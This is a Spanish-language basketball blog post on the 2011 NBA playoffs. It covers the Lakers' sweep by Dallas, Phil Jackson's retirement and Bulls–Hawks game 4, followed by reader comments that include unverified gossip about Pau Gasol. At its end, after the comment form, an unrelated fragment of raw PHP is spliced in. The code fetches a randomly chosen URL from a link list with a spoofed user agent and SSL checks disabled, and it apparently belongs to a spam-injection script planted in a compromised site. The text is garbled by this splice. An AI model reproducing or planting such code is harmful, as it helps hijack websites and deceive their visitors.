Playoffs (08/05/2011): Tripeteados

09 de May de 2011 por TheDeerHunter

Hoy desayunamos con la noticia de que Phil Jackson se jubila. No es sorpresa que los Lakers hayan caído. Se veía venir desde hace mucho, no se puede ganar siempre y han sido derrotados por un gran equipo a un excelente nivel. Sí resulta más sorprendente la manera con la que el maestro Zen se despide de una liga donde su paso ha dejado huella para siempre. Que los Lakers pierdan contra Dallas entra dentro de lo posible en cualquier caso. Que la escoba haya salido a pasear ante la imagen ofrecida es inaceptable.

Habrá tiempo de analizar de forma más pausada las claves generales de la debacle, pero ayer los EX-campeones hicieron todo lo necesario para salir humillados del American Airlines Center. Ridícula defensa y patético ataque. Pero ya está bien de gastar más líneas con los que ya forman parte de la historia de este curso baloncestístico, centrémonos en el equipo ganador.

Los Mavs, facilidades ajenas a parte, estuvieron brillantes. Salieron decididos a hacer sangre. Juego de pase vertiginoso que casi parecía querer cobrarse alguna cuenta pendiente, ejecución precisa creando una barrera de artillería imparable: 9 de 10 Terry, 6 de 6 Stojakovic. Estamos hablando del lanzamiento de 3, ojo.

Quizás lo más justo hubiera sido enfrentar a los suplentes contra los titulares rivales. Entre los mencionados Terry y Stojakovic, más el puertoriqueño Barea produjeron 75 puntos que junto con el resto puntos del banquillo de Dallas hubieran forzado prórroga.

Los Mavs aprovecharon muy bien la inercia para cerrar la eliminatoria y regular fuerzas de cara a lo mucho y duro que les espera. Lo de hasta ahora ha sido lo fácil.

Por el otro lado gran partido entre Bulls y Hawks para poner el 2-2 en una eliminatoria que tiene una pinta de miedo. Rose siguió haciendo daño a su manera (sin excesiva eficacia), Boozer cuajó uno de sus mejores actuaciones de lo que va de postemporada, se tuvo controlado razonablemente bien a Crawford… pero los Hawks desplegaron posiblemente su mejor juego colectivo y con una gran versión de Josh Smith y Al Horford anularon la defensa de Chicago.
Los Bulls necesitarán de más ayuda en sus alas. Deng no brilló como otros días, Bogans estuvo tocado y Korver&Brewer tuvieron un día pésimo.

PREMIOS

MVP: Gran actuación de Josh Smith, cercano al triple doble, con 23 puntos 16 rebotes y 8 asistencias, aunque su selección de tiro no fue la mejor (8 de 22) así que aún mereciéndolo Josh, le daremos el premio a Jason Terry, quien rompió el partido en Dallas con 20 puntos, (Incluídos 6 triples en el primer tiempo) para un total de 32 en la victoria de los Mavs frente a los Lakers.

Sorpresa: Para muchos Stojakovic estaba más acabado que el VHS, pero anoche se cascó 21 puntos sin fallo con un 6 de 6 en triples. Los viejos rockeros…

Decepción: Estaremos bastante de acuerdo, Pau Gasol puede y debe aportar mucho más. Se he visto superado en todos los apartados, y ha parecido agotado más mental que físicamente durante toda la serie. 10 puntitos le contemplan en el partido más importante de la temporada.

Esfuerzo en vano: Cuando los Bulls no ganan, Rose siempre es candidato en éste apartado. 34 puntos y 10 asistencias para el MVP de la temporada regular.

Comenta

15 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Pues ha sido un sorpresón el 4-0 de Dallas. Creo que la actitud de muchos jugadores amarillos ha dejado bastante que desear, no se si será verdad lo de los problemas de vestuario, pero han dado la impresión de equipo roto. Dallas ha dado la impresión de equipo y los Lakers la de banda.
    A vecs suceden cosas como ésta, es como si un castillo de naipes se derrumbase, lo único es que si te sucede a mitad de temporada puedes reconstruirlo, pero si te sucede en playoffs…
    Contra los Hornets ya hubo indicios de que el enfermo no estaba bien, pero se han confirmado contra unos Mavs que no deberían haber sido tan inaccesibles ni aún estando mal Pau.

      Citar

  2. Jona dice:
    #2

    y de la actitud de Odom o Bynum … nada que decir

      Citar

  3. Hynreck dice:
    #3

    Hombre, salvando las distancias, ni de Odom ni de Bynum se espera lo que puede aportar Pau. La cabeza visible de los Lakers es Kobe, y su escudero Pau. Son los 2 que no deben fallar y por eso su exigencia es mayor.

      Citar

  4. HisRoyalAirness dice:
    #4

    Kobe y Pau han fallado, sobre todo el segundo. Hasta ahí todo el mundo de acuerdo. Pero es más que evidente que la defensa exterior de los Lakers necesita juventud y velocidad, no se puede vivir sólo de Kobe. Si no se vuelven locos lo que tienen que hacer es incorporaciones de banquillo y no echar a nadie del núcleo salvo a Fisch (no le estoy echando la culpa de la eliminación, que ya veo a Deer mordiéndome el cuello..), un puesto en el club, las gracias y ya está.
    Mi opinión es, como mucho, traspasar a Odom o Bynum pero quedarse con Kobe, Pau y uno de ellos y buscar piernas jóvenes y, sobre todo, hambre y cojones.

      Citar

  5. Javijaen dice:
    #5

    Vaya sorpresita… Habrá que saber que es lo que ha pasado, si ha sido un desgaste deportivo u otra cosa. Entonces tendrán que tomar decisiones. Sí que deberían mirarse el ombligo, y cambiar alguna estrella, o mejor parte de la plantilla. A ver que pasa en verano…
    Por cierto, Hawks quieren amargarle a Rose el MVP, y ahí están las espadas en todo lo alto. Es curioso como las águilas que quedaron quintos están tan bien en PO. Ya no sé quién quiero que pase a la final…

      Citar

  6. max dice:
    #6

    @Denise: Ahondando en tu comentario de ayer relacionado con cuestiones extradeportivas, hoy he leido en MD que según la web Mediatakeout.com (web de cotilleos estadounidense) Pau se ha visto afectado por una supuesta ruptura con su novia. Citando a fuentes anonimas de los Lakers, la esposa de un jugador (supuestamente Kobe) estaría detrás de la ruptura por haberse relacionado con la novia de Pau y haberla introducido en determinados círculos. Kobe y Pau discutieron por esta situación y actualmente no se hablan.

    No sé que hay de cierto o de falso(seguramente mucho de falso) pero esto ha salido publicado.

      Citar

  7. Denise dice:
    #7

    @max: gracias por la informacion, ya me parecio que Daimiel dijo algo sobre ello el otro día durante la retransmisión del tercer encuentro, aunque no me quedo claro. Algo extradeportivo ha debido de pasar seguro, y puede que sea eso, la verdad es que a Gasol se le ha visto pálido y como enfermo durante toda la serie.
    Ya que a partir de la debacle de Lakers se está rumoreando tanto sobre la necesidad de largar a un hombre alto y traer a Dwight Howard.., puesto que éste se va a ir de los Magic seguro en 2012, por mi sería increiblemente bueno un Arenas-Howard por Gasol y Bynum ó un Turkoglu-Howard por Odom y Gasol. Si no lo quereis traedlos para Orlando.
    PD: ¿Quien es y como se llama la novia de Pau y a que circulos se refiere?

      Citar

  8. Cocinitas dice:
    #8

    Se veia venir que el ambiente de los Lakers este año no era el de años anteriores. Bueno después de este palo y la marcha de Phill esta claro q toca recomponer piezas, la pregunta es si van a cambiar un par de piezas o van a hacer una profunda reconstrucciòn ( yo he pensado en Howard). Esta claro q un base de nivel les hace falta como el comer porque para mi Fischer es el Peor base titular de los equipos que estan en Playoffs, el problema es que pueden dar los Lakers a cambio; retirada de Fischer, y trades de Odom, Artest y Gasol??? Y la pregunta del millón: que entrenador poner al frente la proxima temporada???
    No se a mi me huele a fin de ciclo en el oeste con el ocaso de Spurs y Lakers (8 titulos de los últimos 10) y nuevos cocos con los Thunder, Memphis, Clippers y Kings.

      Citar

  9. GreenPride dice:
    #9

    Vergonzoso lo de los Lakers. Y no lo dijo por la paliza, por el 4-0, ni siquiera por cómo defendieron dejando a los tiradores de los Mavs solos en cada posesión sino porque un equipo así debe saber perder y Bynum y Odom decidieron borrarse y dejarle el marrón de acabar el partido a otros con su penosa actuación antideportiva en el final del partido. Los Lakers no han jugado este último partido y supongo que se espera verano movido en LA más ahora que Phil sale del equipo. La imagen de Pau ha quedado muy tocada y si está enemistado con Kobe podría ser moneda de cambio en algún trade aunque a mí me extrañaría a pesar de los lamentables playoffs que ha hecho. Pero Kobe tampoco se debe ir de rositas que sus playoffs tampoco han sido de traca que digamos y en general el equipo se ha venido totalmente abajo y han dejado de creer unos en otros y de entrar a jugar con ganas. Fin de una época y ya veremos si se rearman y cómo para ser candidatos el año que viene. Los Mavs lo han aprovechado a la perfección y no han dejado levantarse a los Lakers. Enorme partido de los tiradores y Barea aprovechando las debilidades y las nulas ganas de defender de los angelinos. Dallas pasa a ser claramente aspirante al anillo y sobre todo a llegar a las finales por parte del Oeste. Veremos si consiguen mantener el nivel y no les entra el canguelo como otras veces y el gran Dirk consigue por fin su anillo

      Citar

  10. Antoine Doinel dice:
    #10

    Han merecido quedar eliminados, con soberbia no llegas a ningún sitio y se ha visto que los Mavericks con juego en equipo y humildad les han pasado la mano por la cara. Aun así el 4-0 y el bajísimo nivel defensivo y en parte también ofensivo creo que tiene que ver con algo más, extradeportivo, que nunca sabremos.

    Lo que veo es que desde ya, y más si los celtics quedan eliminados, podremos hablar de fin de ciclo, que en parte todos esperábamos ya. Ocklahoma, Chicago, Miami y en menor medida Memphis y Clippers van a ser los dominadores los próximos años. Ahora hay que ver como se recoloca todo y sobre todo estar pendientes de los movimientos que hacen los Lakers y los Celtics, dos equipos que acostumbran a pasar de ciclos y siempre estar ahí.

    Yo creo que Lakers necesita un base como el comer, como apuntabais alguno. Si quieren mantener a Gasol, pueden optar por traspasar a Odom o Bynum y traerse un base de nivel medio/alto (Calderón, o es demasiado medio?). Si traspasan a Gasol, ir a por un pivot dominante tipo Howard y un base joven y con calidad.
    Personalmente, cuanto más la caguen los Lakers, mejor. Y el chauvinismo de los medios con Gasol ya empieza a desesperar bastante.

      Citar

  11. GreenPride dice:
    #11

    Acabo de ver el Hawks-Bulls y la verdad es que sigue sin gustarme el juego desplegado por Chicago en estos playoffs. En este partido Boozer estuvo mejor y Deng peor de lo que venían haciendo el resto de los playoffs pero lo demás más o menos igual. Rose juega muy bien pero durante ratos es demasiado chupón y quitando el tercer partido con porcentajes preocupantes y los Hawks se están empezando a creer que pueden hacer algo. Si Josh Smith jugase siempre así de intenso sería uno de los mejores 3-4 de la liga, partidazo el suyo y el de Horford que esta vez martillearon por dentro para acompañar fenomenal a JJ&Crawford. No veo la serie muy clara para los Bulls aunque creo que la ganaran parece que van a sufrir mucho y quizás hasta el 7º.

      Citar

  12. Denise dice:
    #12

    La han cagado hasta el fondo, pero tampoco creo que sea el final de un ciclo. Cuánto pesimismo. Cuando ganan son los mejores, y cuando pierden son unos mataos,….pues no, si los Lakers tienen un plantillón, incluso me atrevería a decir que con esta plantilla + un base de Mid Level (porque Fisher ya tendrá otro año más de viejo) el año que viene ganarían el anillo,,,siempre y cuando haya actitud y se lleven bien entre ellos, que creo que es por ahí por donde se ha roto la cuerda.
    La eliminación de los Spurs se debe unicamente a términos deportivos (los Grizzlies fueron mejores y punto). La eliminación de los Lakers estoy seguro que tiene factores extradeportivos de por medio y de ello se han aprovechado los Mavs, que son un buen equipo, pero tampoco son ahora el Dream Team porque le hayan metido un 4-0 a Lakers.

      Citar

  13. miquel dice:
    #13

    Dicen que una imagen vale mas que mil palabras por eso yo digo:la eliminatoria i el año de los lakers se define en ese superfallo de artest intentando hacer un mate

      Citar

  14. admin dice:
    #14

    Hemos tenido problemas con esta entrada y ha desaparecido la mitad. Perdonadnos el error.

      Citar

  15. admin dice:
    #15

    Ya hemos recuperado el contenido anterior. Podemos seguir dando caña a los amarillos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>